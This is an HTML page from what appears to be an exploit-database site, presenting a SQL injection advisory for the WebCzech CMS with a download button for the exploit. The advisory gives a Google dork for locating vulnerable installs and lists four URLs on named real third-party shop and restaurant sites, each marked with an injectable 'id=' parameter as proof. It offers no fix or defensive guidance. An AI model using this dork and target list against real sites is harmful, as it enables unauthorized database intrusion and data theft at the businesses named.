<html>
    <head>
        <link rel="shortcut icon" href="https://mr-msa.xyz/IMG/icon.png" type="image/x-icon">
        <style>
            html
            {
                background-color:black;
            }
            pre
            {
                color:green;
                font-size:11pt;
            }
            a
            {
                text-decoration:none;
            }
            button
            {
                background-color:green;
                width:200px;
                height:40px;
                color:#FFF;
                border:1px solid #999;
                border-radius:4px;
                
            }
            .back
            {
                width:60px;
            }
        </style>
        <title>exploit-2</title>
    </head>
    <body>
        <center>
                <a  href="https://mr-msa.xyz/guexdb/exploits/exploit-2" download>
                    <button>
                    Download
                    </button>
                </a>
                <a href="../database">
                    <button class="back">
                    Back
                    </button>
                </a>
        </center>
        <pre>
            ############################################
# Title :  WebCzech CMS Sql Injection Vulnerability
# Author : Guardiran Security Team
# category : webapps
# Tested On : Win 10 , Kali Linux
# Vendor HomePage : https://www.webczech.cz
# Google Dork : intext:"e-shop system WebCzech "    inurl:/.php?id=
############################################
# PROF:
http://www.general-store.cz/static.php?id=5' [Sql injection Vulnerability]
http://www.kozena-penezenka.cz/static.php?id=13'[Sql injection Vulnerability]
http://eshop.pozarnizbrojnice.cz/static.php?id=1'[Sql injection Vulnerability]
http://www.restaurace-retro.cz/eshop/static.php?id=1'[Sql injection Vulnerability]

# Discovered by :  sir shahroukh

############################################

https://cxsecurity.com/issue/WLB-2019010203

############################################
        </pre>
    </body>
</html>